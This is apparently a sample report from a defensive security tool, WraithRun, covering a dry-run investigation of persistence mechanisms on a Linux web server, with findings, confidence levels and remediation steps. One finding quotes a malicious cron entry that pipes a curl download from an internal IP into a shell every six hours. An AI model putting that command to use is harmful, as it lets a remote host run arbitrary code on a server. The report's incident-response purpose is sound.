Sample Report: Linux Server Persistence Investigation¶
This is an anonymized sample report generated by WraithRun showing what output looks like for a persistence-focused investigation on a Linux host.
Run Metadata¶
- Task: "Investigate potential unauthorized persistence mechanisms on the production web server"
- Mode: dry-run
- Model tier: Basic (deterministic)
- Duration: 2.3s
- Tools executed: 4 of 8
Final Answer¶
Investigation complete. Found 5 findings across 4 severity levels. The host shows signs of unauthorized persistence including a suspicious systemd service and a recently modified crontab entry. Recommend immediate review of the identified entries and comparison with approved change records.
Findings¶
1. High — Unrecognized systemd service metrics-collector.service¶
- Confidence: Likely (75%)
- Evidence:
inspect_persistence_locations(turn 1) found a service unit file at/etc/systemd/system/metrics-collector.servicethat was created 5 days ago. The service runs/opt/.cache/mc-agentwhich is not in the approved software inventory. - Recommended action: Disable the service immediately (
systemctl disable metrics-collector), quarantine the binary, compute its SHA-256 hash, and check against threat intelligence feeds. Review the service file for any network-related configuration.
2. High — Modified crontab for user www-data¶
- Confidence: Likely (75%)
- Evidence:
inspect_persistence_locations(turn 1) detected a crontab entry forwww-datathat runscurl -s http://10.0.5.88:8443/check | shevery 6 hours. The entry was added after the last approved deployment. - Recommended action: Remove the crontab entry. Investigate the target IP
10.0.5.88— determine if it is an internal host or attacker infrastructure. Check web server logs for the same IP.
3. Medium — SSH authorized_key for root with no comment¶
- Confidence: Possible (50%)
- Evidence:
inspect_persistence_locations(turn 1) found an SSH public key in/root/.ssh/authorized_keyswith no identifying comment. The key fingerprint does not match any team member keys on record. - Recommended action: Remove the unrecognized key. Rotate all root-level SSH keys. Review
sshdconfiguration to ensurePermitRootLoginis set toprohibit-passwordorno.
4. Low — No suspicious network listeners detected¶
- Confidence: Informational (25%)
- Evidence:
scan_network(turn 2) found 12 listening sockets, all matching expected services (sshd:22, nginx:80, nginx:443, postgres:5432, node:3000, and system services). - Recommended action: No immediate action. Continue monitoring for new listeners.
5. Info — Process-network correlation nominal¶
- Confidence: Informational (25%)
- Evidence:
correlate_process_network(turn 3) mapped all 47 active connections to known processes. No orphaned connections or unexpected outbound destinations. - Recommended action: No action needed. Archive baseline for future comparison.
Investigation Steps¶
| Step | Tool | Duration |
|---|---|---|
| 1 | inspect_persistence_locations |
450ms |
| 2 | scan_network |
120ms |
| 3 | correlate_process_network |
380ms |
| 4 | audit_account_changes |
290ms |
Severity Distribution¶
| Severity | Count |
|---|---|
| Critical | 0 |
| High | 2 |
| Medium | 1 |
| Low | 1 |
| Info | 1 |